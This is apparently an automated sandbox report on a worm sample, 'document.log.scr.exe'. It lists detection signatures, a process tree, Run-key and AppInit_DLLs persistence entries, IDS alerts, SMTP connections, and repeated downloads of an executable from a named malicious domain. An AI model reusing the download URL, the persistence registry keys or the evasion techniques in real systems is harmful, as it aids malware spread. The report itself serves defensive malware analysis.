Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
document.log.scr.exe

Overview

General Information

Sample name:document.log.scr.exe
Analysis ID:1546160
MD5:203e91d369913b5768296e416b0c86d5
SHA1:91ff86480474cbc5b49644700674440f8691b59f
SHA256:99145da1ace397a51d6ed5bd96e1c0167554e6e4028f58a20ddc091ded0fafbe
Tags:exeuser-TeamDreier
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to inject threads in other processes
Creates an undocumented autostart registry key
Detected PE file pumping (to bypass AV & sandboxing)
Drops executables to the windows directory (C:\Windows) and starts them
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample has a suspicious name (potential lure to open the executable)
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sigma detected: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • document.log.scr.exe (PID: 3940 cmdline: "C:\Users\user\Desktop\document.log.scr.exe" MD5: 203E91D369913B5768296E416B0C86D5)
    • tserv.exe (PID: 4192 cmdline: C:\Windows\tserv.exe s MD5: 203E91D369913B5768296E416B0C86D5)
    • notepad.exe (PID: 4948 cmdline: C:\Windows\System32\notepad.exe C:\Users\user\Desktop\2BF7.tmp MD5: E92D3A824A0578A50D2DD81B5060145F)
  • tserv.exe (PID: 2256 cmdline: "C:\Windows\tserv.exe" s MD5: 203E91D369913B5768296E416B0C86D5)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 98.136.96.75, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Windows\tserv.exe, Initiated: true, ProcessId: 4192, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\tserv.exe s, EventID: 13, EventType: SetValue, Image: C:\Windows\tserv.exe, ProcessId: 4192, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tserv
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: msji449c14b7.dll, EventID: 13, EventType: SetValue, Image: C:\Windows\tserv.exe, ProcessId: 4192, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-31T15:26:31.150846+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449732TCP
2024-10-31T15:27:10.072282+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449750TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-31T15:26:28.058727+010020169981A Network Trojan was detected192.168.2.449731193.166.255.17180TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-31T15:26:15.935513+010020197142Potentially Bad Traffic192.168.2.450037193.166.255.17180TCP
2024-10-31T15:26:15.935513+010020197142Potentially Bad Traffic192.168.2.450036193.166.255.17180TCP
2024-10-31T15:26:28.951208+010020197142Potentially Bad Traffic192.168.2.449731193.166.255.17180TCP
2024-10-31T15:26:37.558372+010020197142Potentially Bad Traffic192.168.2.449733193.166.255.17180TCP
2024-10-31T15:26:46.221781+010020197142Potentially Bad Traffic192.168.2.449739193.166.255.17180TCP
2024-10-31T15:26:54.839417+010020197142Potentially Bad Traffic192.168.2.449742193.166.255.17180TCP
2024-10-31T15:26:54.851261+010020197142Potentially Bad Traffic192.168.2.449741193.166.255.17180TCP
2024-10-31T15:27:03.434045+010020197142Potentially Bad Traffic192.168.2.449744193.166.255.17180TCP
2024-10-31T15:27:03.467045+010020197142Potentially Bad Traffic192.168.2.449745193.166.255.17180TCP
2024-10-31T15:27:12.073717+010020197142Potentially Bad Traffic192.168.2.449746193.166.255.17180TCP
2024-10-31T15:27:12.094487+010020197142Potentially Bad Traffic192.168.2.449747193.166.255.17180TCP
2024-10-31T15:27:20.771757+010020197142Potentially Bad Traffic192.168.2.449763193.166.255.17180TCP
2024-10-31T15:27:20.771888+010020197142Potentially Bad Traffic192.168.2.449762193.166.255.17180TCP
2024-10-31T15:27:29.358961+010020197142Potentially Bad Traffic192.168.2.449807193.166.255.17180TCP
2024-10-31T15:27:29.372531+010020197142Potentially Bad Traffic192.168.2.449808193.166.255.17180TCP
2024-10-31T15:27:37.966563+010020197142Potentially Bad Traffic192.168.2.449849193.166.255.17180TCP
2024-10-31T15:27:37.973451+010020197142Potentially Bad Traffic192.168.2.449850193.166.255.17180TCP
2024-10-31T15:27:47.095297+010020197142Potentially Bad Traffic192.168.2.449896193.166.255.17180TCP
2024-10-31T15:27:47.095324+010020197142Potentially Bad Traffic192.168.2.449894193.166.255.17180TCP
2024-10-31T15:27:55.713359+010020197142Potentially Bad Traffic192.168.2.449937193.166.255.17180TCP
2024-10-31T15:27:55.714932+010020197142Potentially Bad Traffic192.168.2.449936193.166.255.17180TCP
2024-10-31T15:28:04.318931+010020197142Potentially Bad Traffic192.168.2.449982193.166.255.17180TCP
2024-10-31T15:28:04.322584+010020197142Potentially Bad Traffic192.168.2.449981193.166.255.17180TCP
2024-10-31T15:28:12.965052+010020197142Potentially Bad Traffic192.168.2.450027193.166.255.17180TCP
2024-10-31T15:28:12.976431+010020197142Potentially Bad Traffic192.168.2.450028193.166.255.17180TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-31T15:26:15.935513+010028033053Unknown Traffic192.168.2.450037193.166.255.17180TCP
2024-10-31T15:26:15.935513+010028033053Unknown Traffic192.168.2.450036193.166.255.17180TCP
2024-10-31T15:26:28.951208+010028033053Unknown Traffic192.168.2.449731193.166.255.17180TCP
2024-10-31T15:26:37.558372+010028033053Unknown Traffic192.168.2.449733193.166.255.17180TCP
2024-10-31T15:26:46.221781+010028033053Unknown Traffic192.168.2.449739193.166.255.17180TCP
2024-10-31T15:26:54.839417+010028033053Unknown Traffic192.168.2.449742193.166.255.17180TCP
2024-10-31T15:26:54.851261+010028033053Unknown Traffic192.168.2.449741193.166.255.17180TCP
2024-10-31T15:27:03.434045+010028033053Unknown Traffic192.168.2.449744193.166.255.17180TCP
2024-10-31T15:27:03.467045+010028033053Unknown Traffic192.168.2.449745193.166.255.17180TCP
2024-10-31T15:27:12.073717+010028033053Unknown Traffic192.168.2.449746193.166.255.17180TCP
2024-10-31T15:27:12.094487+010028033053Unknown Traffic192.168.2.449747193.166.255.17180TCP
2024-10-31T15:27:20.771757+010028033053Unknown Traffic192.168.2.449763193.166.255.17180TCP
2024-10-31T15:27:20.771888+010028033053Unknown Traffic192.168.2.449762193.166.255.17180TCP
2024-10-31T15:27:29.358961+010028033053Unknown Traffic192.168.2.449807193.166.255.17180TCP
2024-10-31T15:27:29.372531+010028033053Unknown Traffic192.168.2.449808193.166.255.17180TCP
2024-10-31T15:27:37.966563+010028033053Unknown Traffic192.168.2.449849193.166.255.17180TCP
2024-10-31T15:27:37.973451+010028033053Unknown Traffic192.168.2.449850193.166.255.17180TCP
2024-10-31T15:27:47.095297+010028033053Unknown Traffic192.168.2.449896193.166.255.17180TCP
2024-10-31T15:27:47.095324+010028033053Unknown Traffic192.168.2.449894193.166.255.17180TCP
2024-10-31T15:27:55.713359+010028033053Unknown Traffic192.168.2.449937193.166.255.17180TCP
2024-10-31T15:27:55.714932+010028033053Unknown Traffic192.168.2.449936193.166.255.17180TCP
2024-10-31T15:28:04.318931+010028033053Unknown Traffic192.168.2.449982193.166.255.17180TCP
2024-10-31T15:28:04.322584+010028033053Unknown Traffic192.168.2.449981193.166.255.17180TCP
2024-10-31T15:28:12.965052+010028033053Unknown Traffic192.168.2.450027193.166.255.17180TCP
2024-10-31T15:28:12.976431+010028033053Unknown Traffic192.168.2.450028193.166.255.17180TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: document.log.scr.exeAvira: detected
Source: C:\Windows\tserv.exeAvira: detection malicious, Label: WORM/Stration.C
Source: C:\Windows\tserv.exeReversingLabs: Detection: 94%
Source: document.log.scr.exeReversingLabs: Detection: 94%
Source: C:\Windows\tserv.exeJoe Sandbox ML: detected
Source: document.log.scr.exeJoe Sandbox ML: detected
Source: document.log.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00406360 GetFileAttributesA,lstrcpyA,lstrcatA,lstrcatA,FindFirstFileA,GetLastError,lstrcmpA,lstrcmpA,lstrcmpA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,FindNextFileA,FindClose,0_2_00406360
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: Joe Sandbox ViewIP Address: 98.136.96.77 98.136.96.77
Source: Joe Sandbox ViewIP Address: 67.195.228.94 67.195.228.94
Source: Joe Sandbox ViewIP Address: 193.166.255.171 193.166.255.171
Source: Network trafficSuricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.4:49731 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49731 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49739 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49742 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49745 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49741 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49741 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49733 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49733 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49746 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49747 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49763 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49808 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49808 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49807 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49807 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49762 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49744 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49744 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49894 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49894 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49850 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49850 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49896 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49896 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49849 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49849 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49937 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49936 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49936 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50028 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50028 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49981 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49981 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49937 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49982 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49982 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50027 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50027 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50037 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50037 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:50036 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:50036 -> 193.166.255.171:80
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49732
Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.4:49750
Source: global trafficTCP traffic: 192.168.2.4:49730 -> 98.136.96.75:25
Source: global trafficTCP traffic: 192.168.2.4:49743 -> 98.136.96.77:25
Source: global trafficTCP traffic: 192.168.2.4:49748 -> 67.195.204.77:25
Source: global trafficTCP traffic: 192.168.2.4:49751 -> 67.195.228.94:25
Source: global trafficTCP traffic: 192.168.2.4:49858 -> 142.251.1.26:25
Source: global trafficTCP traffic: 192.168.2.4:49963 -> 142.250.153.26:25
Source: global trafficTCP traffic: 192.168.2.4:50035 -> 142.251.9.27:25
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficHTTP traffic detected: GET /chr/wtb/lt.exe HTTP/1.1Host: www4.cedesunjerinkas.com
Source: global trafficDNS traffic detected: DNS query: yahoo.com
Source: global trafficDNS traffic detected: DNS query: mta5.am0.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: mta7.am0.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: mta6.am0.yahoodns.net
Source: global trafficDNS traffic detected: DNS query: www4.cedesunjerinkas.com
Source: global trafficDNS traffic detected: DNS query: gmail.com
Source: global trafficDNS traffic detected: DNS query: alt2.gmail-smtp-in.l.google.com
Source: global trafficDNS traffic detected: DNS query: alt4.gmail-smtp-in.l.google.com
Source: global trafficDNS traffic detected: DNS query: alt3.gmail-smtp-in.l.google.com
Source: global trafficDNS traffic detected: DNS query: alt1.gmail-smtp-in.l.google.com
Source: global trafficDNS traffic detected: DNS query: gmail-smtp-in.l.google.com

System Summary

barindex
Source: initial sampleStatic PE information: Filename: document.log.scr.exe
Source: document.log.scr.exeStatic file information: Suspicious name
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00423D83: QueryDosDeviceA,lstrcpyA,lstrcatA,GetLastError,lstrcpyA,lstrcatA,DefineDosDeviceA,GetLastError,lstrcpyA,lstrcatA,CreateFileA,DeviceIoControl,GetLastError,GetLastError,DefineDosDeviceA,GetLastError,0_2_00423D83
Source: C:\Users\user\Desktop\document.log.scr.exeFile created: C:\Windows\tserv.exeJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeFile created: C:\Windows\tserv.exe\:Zone.Identifier:$DATAJump to behavior
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004118000_2_00411800
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004108D00_2_004108D0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040C8E00_2_0040C8E0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040F0E90_2_0040F0E9
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004109070_2_00410907
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004041100_2_00404110
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004091190_2_00409119
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040F1C70_2_0040F1C7
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040C1D00_2_0040C1D0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004049900_2_00404990
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004091A70_2_004091A7
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040E2460_2_0040E246
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00428A080_2_00428A08
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004252140_2_00425214
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004053100_2_00405310
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00408BC00_2_00408BC0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00415BD00_2_00415BD0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0041B3D00_2_0041B3D0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0040DBF00_2_0040DBF0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0041E3A00_2_0041E3A0
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_004094360_2_00409436
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_00409CF70_2_00409CF7
Source: C:\Users\user\Desktop\document.log.scr.exeCode function: 0_2_0041BD000_2_0041BD00
